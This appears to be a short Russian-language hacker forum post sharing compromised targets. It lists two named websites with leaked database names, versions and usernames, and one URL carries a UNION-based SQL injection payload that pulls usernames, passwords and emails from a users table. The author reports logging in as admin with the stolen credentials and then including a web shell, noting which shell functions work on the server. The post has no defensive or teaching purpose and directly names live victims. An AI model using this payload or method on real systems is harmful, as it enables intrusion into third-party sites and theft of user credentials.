ппц как жрать охота..вот замена небольшая))
http://euclid.hamline.edu/~arundquist/php/mysql/movies/showmovie.php?movie_id=279
Name: test
Version: 4.1.22-log
Username: arundquist@localhost
ADD
============================================
http://www.celtnet.org.uk/mobile-phone/rt_readarticle.php?id=-1+union+select+username,password,3,email+from+user s/*
Database name: celtnet
Version: 4.1.19-standard-log
Username: celtnet@localhost
там пхпбб2 есть,но не будем тянуть хеши оттуда, так как логин и пасс покатят, и О ЧУДО, юзер окажецца админом....далее инклудим шелл и...а там кто что сможет)) при свежей BSDe (((
зы: куча команд отключена. советую попробовать include, ибо через passthru половина команд не досступна.(pwd катит).